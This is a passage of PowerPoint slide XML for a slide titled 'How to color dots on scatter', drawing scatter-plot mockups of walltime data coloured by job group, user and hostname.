            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6240600" y="563292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44" name="Блок-схема: узел 284"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6290640" y="555516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45" name="Блок-схема: узел 285"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6313320" y="564012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46" name="Блок-схема: узел 286"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5667120" y="5446440"/>
              <a:ext cx="45360" cy="45360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="759A6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47" name="Блок-схема: узел 287"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5712840" y="5400720"/>
              <a:ext cx="45360" cy="45360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="759A6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48" name="Блок-схема: узел 289"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5719320" y="5448240"/>
              <a:ext cx="45360" cy="45360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="759A6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49" name="Блок-схема: узел 290"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5660640" y="5361480"/>
              <a:ext cx="45360" cy="45360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="759A6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0" name="Блок-схема: узел 291"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5781240" y="5427720"/>
              <a:ext cx="45360" cy="45360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="759A6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1" name="Блок-схема: узел 292"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5783040" y="5370480"/>
              <a:ext cx="45360" cy="45360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="759A6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2" name="Подзаголовок 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5175000" y="6064560"/>
              <a:ext cx="1492200" cy="504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 lnSpcReduction="9999"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1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Color by job group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3" name="Блок-схема: узел 293"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5423400" y="595692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4" name="Блок-схема: узел 294"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5241960" y="567540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5" name="Блок-схема: узел 295"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5377680" y="526896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6" name="Блок-схема: узел 296"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6315840" y="583308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7" name="Блок-схема: узел 297"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6185160" y="5708520"/>
              <a:ext cx="45360" cy="4536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8" name="Блок-схема: узел 298"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5762520" y="5810040"/>
              <a:ext cx="45360" cy="45360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="759A6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9" name="Блок-схема: узел 299"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5158080" y="446328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60" name="Блок-схема: узел 300"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5268600" y="457560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61" name="Блок-схема: узел 301"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5398200" y="473652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62" name="Блок-схема: узел 302"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5139000" y="453996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63" name="Блок-схема: узел 303"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5222880" y="449424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64" name="Блок-схема: узел 304"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5203800" y="461412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65" name="Блок-схема: узел 305"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5334120" y="457560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66" name="Блок-схема: узел 306"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5314320" y="467244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67" name="Блок-схема: узел 307"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5385240" y="463392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68" name="Блок-схема: узел 308"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6096600" y="516492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69" name="Блок-схема: узел 309"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6203520" y="521064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70" name="Блок-схема: узел 310"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6142320" y="525312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71" name="Блок-схема: узел 311"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6237360" y="527796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72" name="Блок-схема: узел 312"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6287400" y="520020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73" name="Блок-схема: узел 313"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6310080" y="528552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74" name="Подзаголовок 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4461840" y="4053960"/>
              <a:ext cx="972000" cy="34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0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Walltime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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="775" name="Прямая соединительная линия 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1720534" y="3497684"/>
            <a:ext cx="8411040" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDash"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="776" name="Прямая соединительная линия 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4306414" y="798764"/>
            <a:ext cx="48960" cy="5232960"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDash"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="777" name="Прямая соединительная линия 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7112254" y="798764"/>
            <a:ext cx="48960" cy="5232960"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDash"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="778" name="Группа 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7052494" y="773564"/>
            <a:ext cx="2604600" cy="2513160"/>
            <a:chOff x="7062120" y="1168200"/>
            <a:chExt cx="2604600" cy="2513160"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="779" name="Прямая со стрелкой 21"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7542000" y="1442520"/>
              <a:ext cx="360" cy="173916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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="780" name="Прямая со стрелкой 22"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7542000" y="3174120"/>
              <a:ext cx="1870560" cy="36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781" name="Подзаголовок 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9065520" y="2837520"/>
              <a:ext cx="601200" cy="34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 fontScale="92500" lnSpcReduction="9999"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0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DB12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82" name="Блок-схема: узел 314"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7750800" y="218664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83" name="Блок-схема: узел 315"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7861320" y="22993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84" name="Блок-схема: узел 316"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7990920" y="246024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85" name="Блок-схема: узел 317"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7731720" y="22633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86" name="Блок-схема: узел 318"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7815600" y="221760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87" name="Блок-схема: узел 319"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7796520" y="23374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88" name="Блок-схема: узел 320"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7926840" y="22993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89" name="Блок-схема: узел 321"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7907040" y="239616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90" name="Блок-схема: узел 322"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7977960" y="23572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91" name="Блок-схема: узел 323"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8807040" y="26269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92" name="Блок-схема: узел 324"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8913600" y="267264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93" name="Блок-схема: узел 325"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8852760" y="27154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94" name="Блок-схема: узел 326"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8947440" y="27403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95" name="Блок-схема: узел 327"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8997480" y="266256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96" name="Блок-схема: узел 328"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9020160" y="27475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97" name="Блок-схема: узел 329"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8328240" y="261540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98" name="Блок-схема: узел 330"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8373960" y="25696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99" name="Блок-схема: узел 331"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8380800" y="261756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0" name="Блок-схема: узел 332"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8321760" y="253044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1" name="Блок-схема: узел 333"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8442720" y="25966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2" name="Блок-схема: узел 334"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8444160" y="253944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3" name="Подзаголовок 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7790400" y="3176640"/>
              <a:ext cx="1492200" cy="504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1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Color by users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4" name="Блок-схема: узел 335"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7740360" y="155232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5" name="Блок-схема: узел 336"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7850880" y="166464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6" name="Блок-схема: узел 337"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7980120" y="182556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7" name="Блок-схема: узел 338"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7721280" y="162900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8" name="Блок-схема: узел 339"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7805160" y="158328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9" name="Блок-схема: узел 340"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7786080" y="170316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0" name="Блок-схема: узел 341"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7916400" y="166464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1" name="Блок-схема: узел 342"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7896600" y="176148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2" name="Блок-схема: узел 343"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7967160" y="172296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3" name="Блок-схема: узел 344"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8795880" y="242208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4" name="Блок-схема: узел 345"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8902440" y="246780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5" name="Блок-схема: узел 346"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8841600" y="251064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6" name="Блок-схема: узел 347"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8936280" y="253512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7" name="Блок-схема: узел 348"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8986320" y="245772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8" name="Блок-схема: узел 349"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9009000" y="254268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9" name="Подзаголовок 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7062120" y="1168200"/>
              <a:ext cx="972000" cy="34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0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Walltime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20" name="Блок-схема: узел 350"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8108640" y="30589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21" name="Блок-схема: узел 351"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7927200" y="277740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22" name="Блок-схема: узел 352"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9000720" y="29350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23" name="Блок-схема: узел 353"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8870040" y="28105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24" name="Блок-схема: узел 354"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8447760" y="291204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825" name="Title 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1526040" y="-16920"/>
            <a:ext cx="914148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rm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4000" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>How to color dots on scatter</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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826" name="Группа 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7172014" y="3634484"/>
            <a:ext cx="2599200" cy="2520000"/>
            <a:chOff x="7181640" y="4029120"/>
            <a:chExt cx="2599200" cy="2520000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="827" name="Прямая со стрелкой 24"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7655760" y="4310640"/>
              <a:ext cx="360" cy="173880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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="828" name="Прямая со стрелкой 26"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7655760" y="6042240"/>
              <a:ext cx="1870920" cy="36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829" name="Подзаголовок 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9179640" y="5705640"/>
              <a:ext cx="601200" cy="34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 fontScale="92500" lnSpcReduction="9999"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0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DB12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0" name="Блок-схема: узел 404"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7923600" y="4934520"/>
              <a:ext cx="45360" cy="45360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF33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1" name="Блок-схема: узел 405"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8034120" y="504684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2" name="Блок-схема: узел 406"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8163360" y="520776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3" name="Блок-схема: узел 407"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7904520" y="5011200"/>
              <a:ext cx="45360" cy="45360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="759A6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4" name="Блок-схема: узел 408"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7988400" y="4965480"/>
              <a:ext cx="45360" cy="45360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="759A6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5" name="Блок-схема: узел 409"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7969320" y="508536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6" name="Блок-схема: узел 410"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8099640" y="5046840"/>
              <a:ext cx="45360" cy="45360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF33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7" name="Блок-схема: узел 411"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8079840" y="5143680"/>
              <a:ext cx="45360" cy="45360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="10428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8" name="Блок-схема: узел 412"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8150400" y="5105160"/>
              <a:ext cx="45360" cy="45360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF800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9" name="Блок-схема: узел 413"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8829720" y="5499720"/>
              <a:ext cx="45360" cy="4536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40" name="Блок-схема: узел 414"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8936280" y="554544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41" name="Блок-схема: узел 415"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8875440" y="55882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42" name="Блок-схема: узел 416"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8970120" y="5612760"/>
              <a:ext cx="45360" cy="4536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43" name="Блок-схема: узел 417"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9020160" y="553536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44" name="Блок-схема: узел 418"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9042840" y="56203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45" name="Блок-схема: узел 419"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8396640" y="542664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46" name="Блок-схема: узел 420"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8442360" y="538092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47" name="Блок-схема: узел 421"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8448840" y="542844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48" name="Блок-схема: узел 422"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8390160" y="534168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49" name="Блок-схема: узел 423"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8510760" y="540792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50" name="Блок-схема: узел 424"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8512560" y="535068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51" name="Подзаголовок 35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7904520" y="6044400"/>
              <a:ext cx="1492200" cy="504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 lnSpcReduction="9999"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1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Color by hostname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52" name="Блок-схема: узел 426"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8152920" y="593712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53" name="Блок-схема: узел 427"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7971480" y="5655600"/>
              <a:ext cx="45360" cy="45360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="759A6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54" name="Блок-схема: узел 428"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8107200" y="5249160"/>
              <a:ext cx="45360" cy="45360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="759A6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55" name="Блок-схема: узел 429"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9045360" y="581328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56" name="Блок-схема: узел 430"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8914680" y="568836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57" name="Блок-схема: узел 431"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8492040" y="5790240"/>
              <a:ext cx="45360" cy="45360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58" name="Блок-схема: узел 432"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7910280" y="438840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59" name="Блок-схема: узел 433"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8020800" y="4500720"/>
              <a:ext cx="45360" cy="45360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="10428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60" name="Блок-схема: узел 434"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8150400" y="4662000"/>
              <a:ext cx="45360" cy="45360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="10428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61" name="Блок-схема: узел 435"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7891200" y="446508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62" name="Блок-схема: узел 436"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7975080" y="4419360"/>
              <a:ext cx="45360" cy="453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63" name="Блок-схема: узел 437"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7956000" y="453924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64" name="Блок-схема: узел 438"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8086680" y="4500720"/>
              <a:ext cx="45360" cy="453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65" name="Блок-схема: узел 439"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8066520" y="4597920"/>
              <a:ext cx="45360" cy="45360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="759A6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66" name="Блок-схема: узел 440"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8137440" y="4559040"/>
              <a:ext cx="45360" cy="4536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67" name="Блок-схема: узел 441"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8826120" y="514512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68" name="Блок-схема: узел 442"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8933040" y="5190840"/>
